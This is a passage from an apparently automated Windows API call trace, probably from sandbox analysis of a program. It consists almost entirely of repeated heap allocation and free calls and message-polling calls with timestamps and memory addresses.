(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0186.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0186.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0186.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0186.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0186.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0186.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0186.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0186.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0186.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0186.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0186.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0186.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0186.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0186.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0186.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fd0 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0186.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0186.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0186.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fd0 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0186.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0186.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0186.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0186.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0186.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0186.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.471] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0186.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0186.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.472] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0186.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0186.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0186.472] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0186.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0186.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0186.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.473] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.473] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.473] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.473] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.473] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.474] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.474] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.474] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.474] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.474] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0186.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0186.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0186.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0186.475] RtlAllocateHeap 